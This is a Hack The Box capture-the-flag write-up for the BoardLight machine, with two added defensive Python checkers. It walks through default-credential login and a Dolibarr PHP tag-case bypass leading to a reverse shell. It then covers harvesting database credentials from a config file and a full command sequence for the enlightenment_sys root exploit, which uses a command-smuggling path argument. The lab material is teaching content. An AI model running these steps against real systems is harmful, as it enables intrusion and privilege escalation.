HTB BoardLight Writeup

Overview#

  • Machine: BoardLight
  • OS: Linux
  • Difficulty: Easy

Reconnaissance#

Port Scan#

The first thing I did was run nmap to discover the open ports on the target machine:

nmap -p- -sV -sC -oA nmap/nmap -v 10.10.11.11
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
[...]
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Virtual host#

Accessing the page served on port 80, we see what is probably a static website, as shown in Figure 1. At the bottom of the page is the domain name board.htb, as shown in Figure 2.

BoardLight Homepage

Figure 1: Homepage of ‘10.10.11.11’.

board.htb

Figure 2: Discovery of the domain name ‘board.htb’.

NOTE

As always, I added ‘board.htb’ to the /etc/hosts file.

Accessing the page at ‘board.htb’ returns the same static site, so I started fuzzing for virtual hosts with ffuf using the following command:

ffuf -w /seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://10.10.11.11/' -H 'Host: FUZZ.board.htb' -fs 15949
[...]
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 192ms]

NOTE

I had to use the option ‘-fs 15949’ to filter responses by size: when the Host header does not match a valid vhost, the server just returns the default static website, which is 15949 bytes long.

The vhost ‘crm.board.htb’ returns a different page, and accessing it we see the Dolibarr login page shown in Figure 3.

Dolibarr

Figure 3: Dolibarr version ‘17.0.0’.

Searching on Google, we find that the default credentials for Dolibarr are admin:admin. Trying them, we are in! But once inside, it seems we have limited permissions, and most features return “access denied”, as seen in Figure 4.

Dolibarr Access denied

Figure 4: Dolibarr admin with limited permissions.

Exploitation#

Searching for this Dolibarr version, we find that it is vulnerable to CVE-2023-30253. The CVE allows executing arbitrary PHP code by bypassing an application-level restriction.

How the vulnerability works#

  1. First, if we don’t have one, we need to create a website and a new page.
  2. With the page created, click “Edit HTML Source”.
  3. On this page, if we try to insert PHP code with the tag , we get the following permission error.

Permission to add or edit PHP

Figure 5: Permission to write PHP code denied.

  4. But if we change the PHP tag to , the page is saved and the PHP code is executed.

Success save

Figure 6: Successfully saved the page and executed the PHP code.

  5. Now we just need to send a reverse shell. I modified the PHP reverse shell from PentestMonkey to work with this CVE and waited for my connection back.
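The restriction the CVE defeats is a server-side check on the saved page source. As an added defensive example (not Dolibarr code and not from this writeup), the scanner below flags PHP open tags in website page sources regardless of letter case or spacing, next to the kind of lowercase-only check that such a bypass slips past. The page sources are assumed to be supplied as strings, for instance exported from wherever the deployment stores them.

```python
import re

# Matches "<?php" in any letter case, "<?=" short echo tags, and a bare "<?"
# followed by whitespace (short_open_tag). The word boundary after "php" and
# the whitespace lookahead keep "<?xml" declarations from matching, since
# those are legitimate in page sources.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|(?=\s))", re.IGNORECASE)


def naive_lowercase_check(source: str) -> bool:
    """The weak form of the check: looks only for the exact lowercase tag."""
    return "<?php" in source


def find_php_tags(source: str) -> list[tuple[int, str]]:
    """Return (line_number, matched_tag) for every PHP open tag in source."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in PHP_OPEN_TAG.finditer(line):
            hits.append((lineno, m.group(0)))
    return hits


def audit_pages(pages: dict[str, str]) -> dict[str, list[tuple[int, str]]]:
    """Map page name -> tag hits for pages that should contain plain HTML only."""
    return {name: hits for name, src in pages.items() if (hits := find_php_tags(src))}


if __name__ == "__main__":
    # Constructed sample pages, not real Dolibarr content.
    sample = {
        "home": "<html><body><p>Welcome</p></body></html>",
        "about": '<?xml version="1.0"?>\n<html><p>About us</p></html>',
        "contact": "<html>\n<p>Mail us</p>\n<?PHP echo 'injected'; ?>\n</html>",
    }
    for name, hits in audit_pages(sample).items():
        print(f"{name}: PHP tags at {hits}")
        print(f"  lowercase-only check would flag it: {naive_lowercase_check(sample[name])}")
```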

Privilege escalation#

When I got the shell as www-data user, I upgraded it to a TTY one with script and stty:

script -c /bin/bash -q /dev/null
<CTRL>z
stty raw -echo;fg 

User flag#

I got a shell as ‘www-data’, and while enumerating the listening ports with ss -ltnp, I discovered that port 3306 (MySQL) is open, so I immediately started looking for its password in the Dolibarr configuration files.

In the Dolibarr folder, I used the following grep command to find where the configuration files are:

grep -ri 'db_name' | grep -v 'jquery'

Results of grep command

Figure 7: Return of grep command.

It returned a lot of files, but the one that caught my attention was /htdocs/conf/conf.php. Opening the file and scrolling up, we find the database credentials, as shown in Figure 8.

db

Figure 8: Database credentials.

WARNING

Remember to keep it simple. The first time on the machine, I spent some time going down the rabbit hole of dumping the hashes from the database and trying to crack them. Go for the easy wins first.

Now with that password, we can simply run su - larrisa, paste the password we just found, and read the user flag in /home/larrisa/user.txt.

Root flag#

After manually enumerating for some time, I found some SUID binaries with the following find command:

find / -perm -u=s -type f 2>/dev/null

Results of the find command

Figure 9: Return of the find command.

Researching the enlightenment_sys binary from that list, I found that the installed version of Enlightenment is vulnerable to privilege escalation via CVE-2022-37706.

Steps to reproduce#

  1. Create two directories that confuse the logic of the binary:
    mkdir -p /tmp/net
    mkdir -p "/dev/../tmp/;/tmp/exploit"
  2. Create the file that the binary will execute through its system() call:
    echo '/bin/sh' > /tmp/exploit
    chmod a+x /tmp/exploit
  3. Run the following command to get a root shell:
    /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
NOTE

More details about the vulnerability are available in the GitHub repository MaherAzzouzi/CVE-2022-37706-LPE-exploit.

And with that we can get the root flag in /root/root.txt.
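The root of this bug is a setuid helper that checks only the literal prefix of a device argument before pasting it into a command string for system(). As an added illustration (not Enlightenment's code), the checks below contrast that weak prefix test with one that canonicalises the path and rejects shell metacharacters, and build an argv list so the mount helper can be run without a shell. The function and option names are assumptions for the example.

```python
import os
import re

# Characters a shell would interpret if the argument ended up in a system() call.
SHELL_META = re.compile(r"[;&|`$()<>\s\\\"']")


def prefix_check(device: str) -> bool:
    """The weak check: only looks at the literal prefix, so "/dev/../tmp/;x" passes."""
    return device.startswith("/dev/")


def is_safe_device(device: str) -> bool:
    """Accept only arguments that stay under /dev after normalisation and that
    contain nothing a shell could interpret. os.path.realpath would additionally
    resolve symlinks; normpath is used here so the result is deterministic."""
    if SHELL_META.search(device):
        return False
    canonical = os.path.normpath(device)  # collapses "/dev/../tmp/x" to "/tmp/x"
    return canonical.startswith("/dev/") and canonical != "/dev/"


def safe_mount_argv(device: str, mountpoint: str, options: str) -> list[str]:
    """Build an argv list for an execve-style call: no shell, so no injection.
    Raises ValueError instead of silently passing a rejected argument through."""
    if not is_safe_device(device):
        raise ValueError(f"rejected device argument: {device!r}")
    if SHELL_META.search(mountpoint) or not os.path.isabs(mountpoint):
        raise ValueError(f"rejected mount point: {mountpoint!r}")
    return ["/bin/mount", "-o", options, device, os.path.normpath(mountpoint)]


if __name__ == "__main__":
    # The device string from the writeup's step 1 and a legitimate one for comparison.
    for dev in ("/dev/../tmp/;/tmp/exploit", "/dev/sdb1"):
        print(f"{dev!r}: prefix check={prefix_check(dev)}, safe={is_safe_device(dev)}")
    print(safe_mount_argv("/dev/sdb1", "/tmp///net", "noexec,nosuid,nodev"))
```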

If you got lost at some point, I have a full walkthrough on YouTube: